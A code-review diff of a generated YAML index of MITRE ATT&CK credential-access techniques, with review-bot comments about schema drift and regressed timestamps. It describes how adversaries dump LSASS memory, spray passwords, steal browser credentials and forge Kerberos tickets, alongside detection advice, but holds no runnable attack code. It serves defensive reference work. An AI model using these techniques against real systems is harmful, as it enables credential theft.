- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
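Review bot: the new T1557.004 block has no `identifier:` key, while the same hunk adds `identifier: T1552` for the preceding technique; because the diff aligns the unchanged `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref:` lines (formerly the tail of T1552) with the new object and then removes `- identifier: T1552`, the Evil Twin entry ends on `atomic_tests: []` with no identifier at all. If `identifier` is meant to be present, add `identifier: T1557.004` before that `atomic_tests: []`; if it is optional, the generator's rule for when it is emitted is worth documenting, since T1556.007 below also lacks one. Separately, the new description carries an upstream wording error ("the adversary may able to monitor"); that text mirrors the ATT&CK object, so fix it at the source rather than by hand-editing this file.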
@@ -44709,9 +45479,9 @@ credential-access:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -44720,21 +45490,22 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -44774,55 +45545,10 @@ credential-access:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Ryan Benson, Exabeam
- - Barry Shteiman, Exabeam
- - Sylvain Gil, Exabeam
- - RedHuntLabs, @redhuntlabs
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
- type: attack-pattern
- created: '2020-02-12T18:57:36.041Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1555.003
- url: https://attack.mitre.org/techniques/T1555/003
- - source_name: Talos Olympic Destroyer 2018
- url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
- description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
- Takes Aim At Winter Olympics. Retrieved March 14, 2019.
- - source_name: Microsoft CryptUnprotectData April 2018
- url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
- description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
- June 18, 2019.
- - source_name: Proofpoint Vega Credential Stealer May 2018
- url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
- description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
- in targeted campaign . Retrieved June 18, 2019.
- - source_name: FireEye HawkEye Malware July 2017
- url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
- description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
- Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
- 2019.
- - source_name: GitHub Mimikittenz July 2016
- url: https://github.com/putterpanda/mimikittenz
- description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
- Retrieved June 20, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-15T14:13:45.294Z'
name: 'Credentials from Password Stores: Credentials from Web Browsers'
description: "Adversaries may acquire credentials from web browsers by reading
files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
@@ -44852,6 +45578,12 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Ryan Benson, Exabeam
+ - Barry Shteiman, Exabeam
+ - Sylvain Gil, Exabeam
+ - RedHuntLabs, @redhuntlabs
+ x_mitre_deprecated: false
x_mitre_detection: 'Identify web browser files that contain credentials such
as Google Chrome’s Login Data database file: AppData\Local\Google\Chrome\User
Data\Default\Login Data
. Monitor file read events of web browser files
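Review bot: not introduced by this hunk, but the `x_mitre_detection` value is split awkwardly around the Chrome path (`Data\Default\Login Data` on one line and ` . Monitor file read events` on the next), which reads like inline markup stripped without collapsing the surrounding whitespace; the same artefact appears in the T1552.003 detection text later in the patch (`.bash_history` / `is` / `read` on separate lines). If the generator post-processes descriptions, normalising whitespace in these fields would make the index easier to read and to grep.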
@@ -44861,23 +45593,58 @@ credential-access:
reading web browser process memory, utilizing regular expressions, and those
that contain numerous keywords for common web applications (Gmail, Twitter,
Office365, etc.).'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Access'
- 'File: File Access'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
+ created: '2020-02-12T18:57:36.041Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1555/003
+ external_id: T1555.003
+ - source_name: GitHub Mimikittenz July 2016
+ description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
+ Retrieved June 20, 2019.
+ url: https://github.com/putterpanda/mimikittenz
+ - source_name: Talos Olympic Destroyer 2018
+ description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+ Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+ url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+ - source_name: Microsoft CryptUnprotectData April 2018
+ description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
+ June 18, 2019.
+ url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
+ - source_name: Proofpoint Vega Credential Stealer May 2018
+ description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
+ in targeted campaign . Retrieved June 18, 2019.
+ url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
+ - source_name: FireEye HawkEye Malware July 2017
+ description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
+ Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
+ 2019.
+ url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1555.003
atomic_tests: []
T1557.003:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-09-12T19:46:04.759Z'
name: DHCP Spoofing
description: "Adversaries may redirect network traffic to adversary-owned systems
by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -44914,23 +45681,23 @@ credential-access:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Alex Spivakovsky, Pentera
+ - Andrew Allen, @whitehat_zero
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
specify that the IP allocations are low or have run out; these EIDs may indicate
a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- Windows
- macOS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Alex Spivakovsky, Pentera
- - Andrew Allen, @whitehat_zero
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -44963,21 +45730,20 @@ credential-access:
- source_name: solution_monitor_dhcp_scopes
description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
- March 7, 2022.'
- url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+ September 12, 2024.'
+ url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
- source_name: w32.tidserv.g
description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
14, 2022.
url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1552.004:
technique:
- modified: '2023-04-12T23:52:08.194Z'
+ modified: '2024-10-04T11:31:56.622Z'
name: 'Unsecured Credentials: Private Keys'
description: "Adversaries may search for private key certificate files on compromised
systems for insecurely stored credentials. Private cryptographic keys and
@@ -44988,7 +45754,7 @@ credential-access:
as ~/.ssh
for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\
on Windows. Adversary tools may also search compromised systems for file extensions
relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation:
- Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a
+ Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a
device key and a transport key are generated and used to verify the device’s
identity.(Citation: Microsoft Primary Refresh Token) An adversary with access
to the device may be able to export the keys in order to impersonate the device.(Citation:
@@ -45022,7 +45788,7 @@ credential-access:
- macOS
- Windows
- Network
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Access'
@@ -45050,7 +45816,7 @@ credential-access:
- source_name: Kaspersky Careto
description: Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The
Masked APT. Retrieved July 5, 2017.
- url: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
+ url: https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
- source_name: Microsoft Primary Refresh Token
description: Microsoft. (2022, September 9). What is a Primary Refresh Token?.
Retrieved February 21, 2023.
@@ -45061,14 +45827,13 @@ credential-access:
url: https://en.wikipedia.org/wiki/Public-key_cryptography
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.004
atomic_tests: []
T1557.001:
technique:
- modified: '2023-04-25T14:00:00.188Z'
+ modified: '2022-10-25T15:46:55.393Z'
name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
spoof an authoritative source for name resolution to force communication with
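Review bot: the `modified` timestamp for T1557.001 moves backwards, from '2023-04-25T14:00:00.188Z' to '2022-10-25T15:46:55.393Z', while every other technique in this patch is updated to a 2024 timestamp, and the following hunk leaves its `x_mitre_attack_spec_version` at 3.0.0 rather than 3.2.0. That pattern suggests this object was regenerated from an older copy of the source bundle; verify which input produced it before merging so the index does not quietly regress that technique.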
@@ -45176,12 +45941,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1557.001
atomic_tests: []
T1003.001:
technique:
- modified: '2023-12-27T17:57:20.003Z'
+ modified: '2024-08-13T13:52:45.379Z'
name: 'OS Credential Dumping: LSASS Memory'
description: |
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
@@ -45218,6 +45982,7 @@ credential-access:
- Edward Millington
- Ed Williams, Trustwave, SpiderLabs
- Olaf Hartong, Falcon Force
+ - Michael Forret, Quorum Cyber
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
@@ -45230,7 +45995,7 @@ credential-access:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.4'
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Process: Process Access'
- 'Windows Registry: Windows Registry Key Modification'
@@ -45280,12 +46045,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.001
atomic_tests: []
T1110.003:
technique:
- modified: '2024-03-07T14:33:34.201Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Spraying'
description: |-
Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -45311,6 +46075,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- John Strand
@@ -45326,18 +46091,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
@@ -45364,14 +46129,11 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.003
atomic_tests: []
T1056.003:
technique:
- modified: '2023-03-30T21:01:46.711Z'
+ modified: '2024-10-15T16:43:43.849Z'
name: Web Portal Capture
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -45382,13 +46144,13 @@ credential-access:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: File monitoring may be used to detect changes to files in
the Web directory for organization login pages that do not match with authorized
updates to the Web server's content.
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -45402,6 +46164,7 @@ credential-access:
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
created: '2020-02-11T18:59:50.058Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056/003
@@ -45412,12 +46175,12 @@ credential-access:
url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1003.005:
technique:
- modified: '2024-04-18T23:47:54.553Z'
+ modified: '2024-10-15T14:18:59.123Z'
name: 'OS Credential Dumping: Cached Domain Credentials'
description: "Adversaries may attempt to access cached domain credentials used
to allow authentication to occur in the event a domain controller is unavailable.(Citation:
@@ -45492,7 +46255,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.005
atomic_tests: []
T1558.001:
@@ -45538,7 +46300,7 @@ credential-access:
url: https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
description: Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated).
Retrieved February 27, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-05T16:07:03.779Z'
name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
description: "Adversaries who have the KRBTGT account password hash may forge
Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation:
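Review bot: the `modified` value for T1558.001 goes from '2022-04-25T14:00:00.188Z' back to '2020-11-05T16:07:03.779Z', the only technique in this patch besides T1557.001 whose timestamp moves backwards. A regeneration should not produce an older object than the one it replaces, so this is worth checking against the upstream bundle rather than accepting as a routine refresh.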
@@ -45573,16 +46335,14 @@ credential-access:
- 'Logon Session: Logon Session Metadata'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1558.001
atomic_tests: []
T1649:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal or Forge Authentication Certificates
description: |-
- Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
+ Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
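Review bot: for T1558.001 this hunk removes both `- spec_version: '2.1'` and `- x_mitre_attack_spec_version: 2.1.0` without adding a replacement `x_mitre_attack_spec_version`, and leaves the deprecated `x_mitre_permissions_required: - User` in place; every other technique in the patch keeps an `x_mitre_attack_spec_version` (bumped to 3.2.0) and has `x_mitre_permissions_required` dropped. Combined with the 2020 `modified` date in the previous hunk, T1558.001 looks like it was sourced from a pre-3.x object; fix the input so the field set matches the other entries instead of leaving one technique with a different schema.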
@@ -45592,21 +46352,23 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Tristan Bennett, Seamless Intelligence
+ - Lee Christensen, SpecterOps
+ - Thirumalai Natarajan, Mandiant
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- - Azure AD
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Tristan Bennett, Seamless Intelligence
- - Lee Christensen, SpecterOps
- - Thirumalai Natarajan, Mandiant
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -45655,33 +46417,11 @@ credential-access:
url: https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1649
atomic_tests: []
T1552.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
- type: attack-pattern
- created: '2020-02-04T13:02:11.685Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1552.003
- url: https://attack.mitre.org/techniques/T1552/003
- - url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
- description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- source_name: External to DA, the OS X Way
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-12T15:24:04.912Z'
name: 'Unsecured Credentials: Bash History'
description: 'Adversaries may search the bash command history on compromised
systems for insecurely stored credentials. Bash keeps track of the commands
@@ -45696,25 +46436,43 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: Monitoring when the user's .bash_history
is
read can help alert to suspicious activity. While users do typically rely
on their history of commands, they often access this history through other
utilities like "history" instead of commands like cat ~/.bash_history
.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
+ created: '2020-02-04T13:02:11.685Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1552/003
+ external_id: T1552.003
+ - source_name: External to DA, the OS X Way
+ description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1552.003
atomic_tests: []
T1552.001:
technique:
- modified: '2024-04-15T21:33:00.213Z'
+ modified: '2024-10-15T14:28:43.639Z'
name: 'Unsecured Credentials: Credentials In Files'
description: |-
Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
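Review bot: `spec_version: '2.1'` is removed here (the `- spec_version: '2.1'` line) and again in every later hunk of this patch, with nothing added in its place, while `x_mitre_attack_spec_version` moves to 3.2.0; `spec_version` is a required common property on STIX 2.1 objects, so if the generator now reads a STIX 2.0 source (the cti repository rather than attack-stix-data) that switch should be stated in the PR description, and any consumer that validates these entries as STIX 2.1 will need to know. Separately, `x_mitre_permissions_required: - User` is dropped for T1552.003 with no replacement, and the rest of the churn in this hunk (`type`, `id`, `created`, `created_by_ref` and `external_references` moving from the top of the object to the bottom, `external_id` and `url` swapping order inside the reference) is pure key reordering; emitting keys in a stable order from the generator would keep future diffs down to the real changes.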
@@ -45788,7 +46546,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.001
atomic_tests: []
T1606.001:
@@ -45850,11 +46607,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1528:
technique:
- modified: '2024-03-24T19:41:54.832Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal Application Access Token
description: "Adversaries can steal application access tokens as a means of
acquiring credentials to access remote systems and resources.\n\nApplication
@@ -45903,6 +46659,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Suzy Schapperle - Microsoft Azure Red Team
- Shailesh Tiwary (Indian Army)
@@ -45911,6 +46668,7 @@ credential-access:
- Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
- Ram Pliskin, Microsoft Azure Security Center
- Jack Burns, HubSpot
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
@@ -45921,13 +46679,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- - Office 365
- - Azure AD
- - Google Workspace
- Containers
- x_mitre_version: '1.3'
+ - IaaS
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'User Account: User Account Modification'
